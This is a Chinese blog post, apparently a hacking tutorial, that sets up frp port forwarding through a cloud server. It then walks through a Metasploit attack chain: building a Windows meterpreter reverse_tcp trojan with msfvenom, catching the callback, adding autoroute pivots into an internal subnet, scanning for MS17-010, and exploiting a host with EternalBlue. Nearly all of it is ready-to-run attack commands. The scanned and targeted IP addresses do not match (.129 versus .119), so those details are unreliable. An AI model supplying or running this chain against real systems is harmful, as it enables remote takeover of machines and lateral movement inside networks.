frp 的常规使用

作者: print("") 分类: 信息安全 发布时间: 2019-07-27 00:37

拓扑如下:

阿里云服务器一台

内网 机器一台

https://github.com/fatedier/frp/releases

下载 frp 的服务端:

[root@btmail frp_0.27.1_linux_amd64]# cat frps.ini 
[common]
bind_port = 7000

然后启动

客户机parot OS

 

[common]
server_addr = 39.105.93.185
server_port = 7000

[ssh]
type = tcp
local_ip = 0.0.0.0
local_port = 4444
remote_port = 6551

启动

此时我们只要打开msf进行简单的配置,

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run 

然后一个木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444 -f exe x>Xaly.exe

自己点击上线一下

添加一条路由

run autoroute -s 192.168.1.0/24

查看路由

run autoroute -p


然后ms17010扫描一下 内网

use auxiliary/scanner/smb/smb_ms17_010 
set rhosts 192.168.1.0/24
set threads 30
run

发现一台 192.168.1.129 存在ms17010


use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.119
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.211



Lhost的IP为session2的被控制的IP

然后开始攻击run



此刻的 192.168.1.211 

被控制的机器当做了一个流量转发的机器。

通过192.168.1.211 的4444端口转到到公网的6551 然后转到了我当前内网的机器

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。